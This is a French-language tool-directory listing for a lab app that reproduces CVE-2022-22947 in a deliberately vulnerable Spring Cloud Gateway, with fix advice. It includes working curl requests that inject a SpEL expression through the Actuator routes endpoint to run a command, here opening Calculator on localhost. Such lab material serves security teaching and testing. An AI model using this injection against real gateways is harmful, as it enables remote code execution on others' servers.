Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-22947-pb-ai — Une application de vérification de vulnérabilité générée par IA | Kitploit
Outils/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests de Sécurité des APIApprentissage et Éducation
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

Une application de vérification de vulnérabilité générée par IA

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Application de validation de vulnérabilité CVE-2022-22947 Spring Cloud Gateway

Il s'agit d'une application Spring Cloud Gateway spécialement conçue pour démontrer et valider la vulnérabilité CVE-2022-22947. Cette application utilise une version vulnérable de Spring Cloud Gateway et permet l'exécution de code arbitraire via le point de terminaison Actuator.

Aperçu de la vulnérabilité

CVE-2022-22947 est une vulnérabilité d'exécution de code à distance dans Spring Cloud Gateway. Un attaquant peut exécuter du code arbitraire en ajoutant dynamiquement des routes contenant des expressions SpEL malveillantes via le point de terminaison Actuator.

Prérequis

  • Java 11+
  • Maven 3.6+
  • Système macOS (pour la démonstration de la calculatrice)

Démarrer l'application

root@kitploit:~
mvn spring-boot:run

L'application démarrera sur http://localhost:8080.

Étapes de validation de la vulnérabilité

Étape 1 : Ajouter une route malveillante

Envoyez une requête POST au point de terminaison /actuator/gateway/routes/test pour ajouter une route contenant une expression SpEL malveillante :

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

Étape 2 : Actualiser les routes

Envoyez une requête POST au point de terminaison /actuator/gateway/refresh pour actualiser les routes :

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

Étape 3 : Déclencher le code malveillant

Accédez à la route malveillante pour déclencher l'exécution du code :

root@kitploit:~
curl http://localhost:8080/test

Résultat attendu

Après une exploitation réussie de la vulnérabilité, l'application Calculatrice de macOS s'ouvrira.

Informations clés sur les requêtes

1. Requête pour ajouter une route malveillante

Point de terminaison : POST /actuator/gateway/routes/test

En-tête de requête :

root@kitploit:~
Content-Type: application/json

Corps de la requête :

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. Requête pour actualiser les routes

Point de terminaison : POST /actuator/gateway/refresh

3. Requête pour déclencher la vulnérabilité

Point de terminaison : GET /test

Analyse de la vulnérabilité

Cette vulnérabilité permet à un attaquant d'ajouter dynamiquement des routes via le point de terminaison Actuator et d'exécuter du code arbitraire en utilisant des expressions SpEL dans les filtres de route. Le cœur du problème réside dans le traitement inapproprié des expressions SpEL dans la configuration des routes par Spring Cloud Gateway.

Recommandations de correction

  1. Mettre à jour vers Spring Cloud Gateway 3.1.1+ ou 3.0.7+
  2. Désactiver le point de terminaison Actuator ou limiter l'accès
  3. Utiliser Spring Security pour protéger le point de terminaison Actuator

Informations de version

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (version vulnérable)

Remarques importantes

⚠️ Avertissement de sécurité : Cette application est destinée uniquement à des fins éducatives et de recherche en sécurité. Ne l'utilisez pas et ne la déployez pas dans un environnement de production.

⚠️ Mention légale : Lorsque vous utilisez cette application pour tester des vulnérabilités, assurez-vous de disposer des autorisations appropriées. Les tests non autorisés peuvent violer les lois et réglementations.

Télécharger l’outil